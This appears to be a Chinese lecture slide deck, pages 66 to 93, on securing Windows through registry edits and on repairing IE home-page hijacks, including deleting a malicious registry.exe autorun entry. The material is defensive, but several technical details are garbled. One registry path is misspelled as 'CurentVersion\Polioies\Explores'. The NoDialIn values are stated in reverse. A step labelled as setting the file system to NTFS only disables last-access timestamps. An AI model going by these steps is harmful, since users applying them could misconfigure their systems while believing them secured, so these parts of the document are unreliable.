当前，网上有许多流行黑客程序，它们能够对整个计算机系统造成了极大安全威胁，其中有一个名叫BackDoor后门程序，专门拣系统漏洞进行攻击。为预防这种程序对系统造成破坏，我们有必要经过对应设置来预防BackDoor对系统破坏。设置时，在编辑器操作窗口中用鼠标依次单击键值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run，假如在右边窗口中如发觉了“Notepad”键值，就将它删除，这么就能到达预防目标了。

66BNCC第66页注册表安全实例3、不允许使用“控制面板”

控制面板是Windows系统控制中心，能够对设备属性，文件系统，安全口令等很多系统很关键东西进行修改，我们当然需要防范这些了。

在隐藏和禁止使用“控制面板”时，我们能够在开始菜单中运行栏中输入regedit命令，打开注册表编辑器操作界面，然后在该界面中，依次用鼠标单击\\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\键值，并在其中新建DWORD值NoDispCPL，把值修改为1（十六进制）就行了。

67BNCC第67页注册表安全实例4、拒绝经过网络访问软盘

为了预防病毒入侵整个网络，造成整个网络处于瘫痪状态，所以我们必须严格管理计算机输入设备，以断绝病毒源头，为此就要禁止经过网络访问软盘。设置时，首先单击开始按钮，从弹出菜单中选择运行命令；随即，程序将弹出一个运行对话框，在该对话框中输入regedit命令，然后在打开注册表编辑器中依次打开键值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]，在右边窗口中看看有没有键值AllocateFloppies，假如没有请创建DWORD值，名字取为AllocateFloppies，把它值修改为０或１，其中0代表可被域内全部管理员访问，1代表仅可被当地登陆者访问。68BNCC第68页注册表安全实例5、让“文件系统”菜单在系统属性中消失

为了预防非法用户随意篡改系统中文件，我们有必要把“系统属性”中“文件系统”菜单隐藏起来。隐藏时，只要在注册表编辑器中用鼠标依次打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System键值，在右边窗口中新建一个DWORD串值：“NoFileSysPage”，然后把它值改为“1”即可。

69BNCC第69页注册表安全实例6、锁定桌面

桌面设置包含壁纸、图标以及快捷方式，它们设置普通都是我们经过精心选择才设定好。大多数情况下，我们不希望他人随意修改桌面设置或随意删除快捷方式。怎么办?其实修改注册表能够帮我们锁定桌面，这里“锁定”含义是对他人修改不做储存，不论他人怎么改，只要重新开启计算机，我们设置就会原封不动地出现在眼前。设置时，运行regedit进入注册表编辑器，找到以下分支：Hkey－Users\Software\Microsoft\Windows\CurentVersion\Polioies\Explores，并用鼠标双击“NoSaveSetting”，并将其键值从0改为1就OK了！

70BNCC第70页注册表安全实例7、禁用Regedit命令

注册表对于很多用户来说是很危险，尤其是初学者，为了安全，最好还是禁止注册表编辑器regedit.exe运行，在公共机房愈加主要，不然自己机器一不小心就被改得一塌糊涂了。

修改注册表时，首先运行regedit进入注册表编辑器操作界面，在该界面中用鼠标依次单击HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\键值，在右边窗口中假如发觉Policies下面没有System主键，则请在它下面新建一个主键，取名System，然后在右边空白处新建一个DWORD串值，名字取为DisableRegistryTools，把它值修改为1，这么修改以后，使用这个计算机人都无法再运行regedit.exe来修改注册表了。

71BNCC第71页注册表安全实例8、禁止修改“开始”菜单

普通，用户开启某一个程序时往往会在开始菜单下面程序组中寻找需要程序，假如我们随意更改开始菜单中内容，可能会影响其它用户打开程序，所以我们经常需要禁止修改“开始”菜单中内容。在设置这个内容时，我们能够用鼠标在注册表编辑器窗口中依次单击以下键值：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore，接着在右边窗口中新建一个DWORD串值：“NoChangeStartMenu”，并把它值设置为“1”。72BNCC第72页注册表安全实例9、让用户只使用指定程序

为预防用户非法运行或者修改程序，造成整个计算机系统处于混乱状态，我们能够经过修改注册表来到达让用户只能使用指定程序目标，从而确保系统安全。设置时，能够在注册表编辑器窗口中依次打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer键值，然后在右边窗口中新建一个DWORD串值，名字取为“RestrictRun”，把它值设为“1”。然后在RestrictRun主键下分别添加名为“1”、“2”、“3”等字符串值，然后将“1”，“2”、“3”等字符串值设置为我们允许用户使用程序名。比如将“1”、“2”、“3”分别设置为word.EXE、notepad.EXE、write.EXE，则用户只能使用word、记事本、写字板了，这么我们系统将会做到最大保障，也能够限制用户运行无须要软件了。

73BNCC第73页注册表安全实例10、预防WinNuke破坏

现在有一个叫WinNuke程序，能对计算机中Windows系统有破坏作用，为预防该程序破坏Windows操作系统，造成整个计算机系统瘫痪，所以我们有必要预防WinNuke破坏性。我们能够在注册表中对其进行设置，以确保系统安全。设置时，在编辑器操作窗口中用鼠标依次单击键值HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP，然后在右边窗口中新建或修改字符串“BSDUrgent”，并把其值设置为0，这么就能够预防WinNuke对系统破坏了。

74BNCC第74页注册表安全实例11、禁用"任务栏属性"功效

任务栏属性功效，能够方便用户对开始菜单进行修改，能够修改Windows系统很多属性和运行程序，这在我们看来是件很危险事情，所以有必要禁止对它修改。

修改设置时，首先运行regedit进入注册表编辑器，找到以下分支HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，在右窗格内新建一个DWORD串值"NoSetTaskBar"，然后双击"NoSetTaskBar"键值，在弹出对话框"键值"框内输入1，就能够到达禁用"任务栏属性"功效了。

75BNCC第75页注册表安全实例12、禁止修改显示属性

有许多用户为了使自己使用电脑外观设置变得更漂亮一点，方便能表达出个性化格调，往往经过修改显示属性到达更改外观目标。但在实践操作中，我们有时要确保全部计算机设置都必须相同，以方便同时教学，这时我们就需要禁止修改显示属性了。修改时，能够用鼠标依次打开以下分支：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System，接着在右边窗口中新建一个DOWRD串值：然后将“新值#1”更名为“NoDispCPL”，并将其值设为“1”就能够了。

76BNCC第76页注册表安全实例13、隐藏“网上邻居”

在局域网中，我们经常能够经过网上邻居来访问别计算机上内容，从而实现了资源共享目标。但有时网上邻居会给我们造成安全上隐患，比如有不怀好意用户能够利用网上邻居来非法删除其它计算机上主要数据，给其它计算机造成了损失。为了防止这么损失，我们能够利用注册表来隐藏“网上邻居”。设置时，请用鼠标依次访问键值HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，接着在右边窗口中新建DWORD值NoNetHood，并把该值设置为1（十六进制）。

77BNCC第77页注册表安全实例14、禁止屏幕保护使用密码

在公众场所下使用电脑，最忌讳是用户随意设置系统密码，因为一旦某个用户设置了密码后，其它用户就不能正常使用，严重能使计算机无法开启。为了防止这些现象发生，我们有必要限制用户使用带有密码屏幕保护。设置时，首先运行regedit命令打开注册表编辑器窗口，然后在该窗口中依次单击以下键值：CURRENT_USER\ControlPanel\desktop\ScreenSaveUsePassword，接着修改ScreenSaveUsePassword值，假如把该值设置为0，表示为屏幕保护不设密码，假如设置为1则使用预设密码，我们依据自己需要设置就行了。

78BNCC第78页注册表安全实例屏蔽工作组信息HKEY_CURRENT_USER\Software\Windows\CurrentVersion\Policies\NetworkNoNetSetupIDPage双字节1去掉访问控制选项HKEY_CURRENT_USER\Software\Windows\CurrentVersion\Policies\NetworkNoNetSetupSecurityPage双字节179BNCC第79页注册表安全实例隐藏一个服务器

1、打开注册表编辑器，并在编辑器对话框中用鼠标依次单击以下分支：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters键值。

2、用鼠标单击该键值下面Hidden数值名称，假如未发觉此名称，那么添加一个，其数据类型为REG_DWORD。

3、接着用鼠标双击此项，在弹出“DWORD编辑器”对话框中输入1即可。

4、最终单击“确定”按钮，并退出注册表编辑窗口，重新开启计算机就能够在局域网中隐藏一个服务器了。

80BNCC第80页注册表安全实例不允许用户拨号访问

假如用户计算机上面有主要信息，有可能不允许其它人随便访问。那么怎样禁止其它人拨入访问你计算机，降低安全隐患呢，详细步骤为：

1、打开注册表编辑器，并在编辑器中依次展开以下键值：

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Network]；

2、在编辑器右边列表中用鼠标选择“NoDialIn”键值，假如没有该键值，必须新建一个DWORD值，名称设置为“NoDialIn”；

3、接着用鼠标双击“NoDialIn”键值，编辑器就会弹出一个名为“字符串编辑器”对话框，在该对话框文本栏中输入数值“1”，其中0代表禁止拨入访问功效，1代表允许拨入访问功效；

4、退出后重新登录网络，上述设置就会起作用。81BNCC第81页注册表安全实例限制使用系统一些特征

1、运行注册表编辑器，进入HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System键值；

2、假如不存在该键值，就新建一个；

3、然后将该键值下方DisableTaskManager值设为1，表示将阻止用户运行任务管理器。

4、接着将NoDispAppearancePage设为1，表示将不允许用户在控制面板中改变显示模式；

5、下面再将NoDispBackgroundPage设为1，表示将不允许用户改变桌面背景和墙纸。

82BNCC第82页注册表安全实例将文件系统设置为NTFS格式

1、打开注册表编辑器，并在编辑器中依次展开以下键值：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem；

2、在注册表编辑器中用鼠标单击“编辑”菜单，并在下拉菜单中选择“新建”菜单项，并在其弹出子菜单中单击“DWORD值”；

3、在编辑器右边列表中输入DWORD值名称为“NtfsDisableLastAccessUpdate”；

4、接着用鼠标双击NtfsDisableLastAccessUpdate键值，编辑器就会弹出一个名为“字符串编辑器”对话框，在该对话框文本栏中输入数值“1”，其中0代表“取消”该项功效，1代表“启用”该项功效。

83BNCC第83页主页被改

1、IE默认连接首页被修改IE浏览器上方标题栏被改成“欢迎访问……网站”样式，这是最常见篡改伎俩，受害者众多。受到更改注册表项目为：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main\StartPageHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\StartPage

84BNCC第84页主页被改

处理方法：①在Windows开启后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；②展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main下，在右半部分窗口中找到串值“StartPage”双击，将StartPage键值改为“about:blank”即可；③同理，展开注册表到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main在右半部分窗口中找到串值“StartPage”，然后按②中所述方法处理。

85BNCC第85页主页被改特殊例子：当IE起始页变成了一些网址后，就算你经过选项设置修改好了，重启以后又会变成他们网址啦，十分难缠。其实他们是在你机器里加了一个自运行程序，它会在系统开启时将你IE起始页设成他们网站。

处理方法：运行注册表编辑器regedit.exe，然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键，然后将其下registry.exe子键删除，然后删除自运行程序c:\ProgramFiles\registry.exe，最终从IE选项中重新设置起始页就好了。86BNCC第86页主页被改2、篡改IE默认页有些IE被改了起始页后，即使设置了“使用默认页”依然无效，这是因为IE起始页默认页也被篡改啦。详细说来就是以下注册表项被修改：HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\

Main\Default_Page_URL“Default_Page_URL”这个子键键值即起始页默认页。

处理方法：运行注册表编辑器，然后展开上述子键，将“Default_Page_UR”子键键值中那些篡改网站网址改掉就好了，或者设置为IE默认值。

87BNCC第87页主页被改主要是修改了注册表中IE设置下面这些键值(DWORD值为1时为不可选)：[HKEY_CURRENT_USER\Software\Policies\Microsoft\

InternetExplorer\ControlPanel]

"Settings"=dword:1[HKEY_CURRENT_USER\Software\Policies\Microsoft\

InternetExplorer\ControlPanel]

"Links"=dword:1[HKEY_CURRENT_USER\Software\Policies\Microsoft\

InternetExplorer\ControlPanel]

"SecAddSites"=dword:1

处理方法：将上面这些DWORD值改为“0”即可恢复功效。

88BNCC第88页主页被改

4、IE默认首页灰色按扭不可选这是因为注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\

InternetExplorer\ControlPanel下DWORD值“homepage”键值被修改缘故。原来键值为“0”，被修改为“1”（即为灰色不可选状态）。

处理方法：将“homepage”键值改为“0”即可89BNCC第89页主页被改5、IE标题栏被修改在系统默认状态下，是由应用程序本身来提供标题栏信息，但也允许用户自行在上述注册表项目中填加信息，而一些恶意网站正是利用了这一点来得逞：它们将串值WindowTitle下键值改为其网站名或更多广告信息，从而到达改变浏览者IE标题栏目标。详细说来受到更改注册表项目为：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\

Main\WindowTitleHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\

Main\WindowTitle

90BNCC第90页主页被改处理方法：①在Windows开启后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

②展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main下，在右半部分窗口中找到串值“WindowTitle”，将该串值删除即可，或将WindowTitle键值改为“IE浏览器”等你喜欢名字；③同理，展开注册表到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main然后按②中所述方法处理。91BNCC第91页主页被改

6、IE右键菜单被修改受到修改注册表项目为：HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\MenuExt下被新建了网页广告信息，并由此在IE右键菜单中出现！

92BNCC第92页主页被改处理方法：打开注册标编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\MenuExt删除相关广告条文即可，注意不要把下载软件FlashGet和Netants也删除掉啊，这两个可是“正常”呀，除非你不想在IE右键菜单中见到它们。93BNCC第93页主页被改7、IE默认搜索引擎被修改在IE浏览器工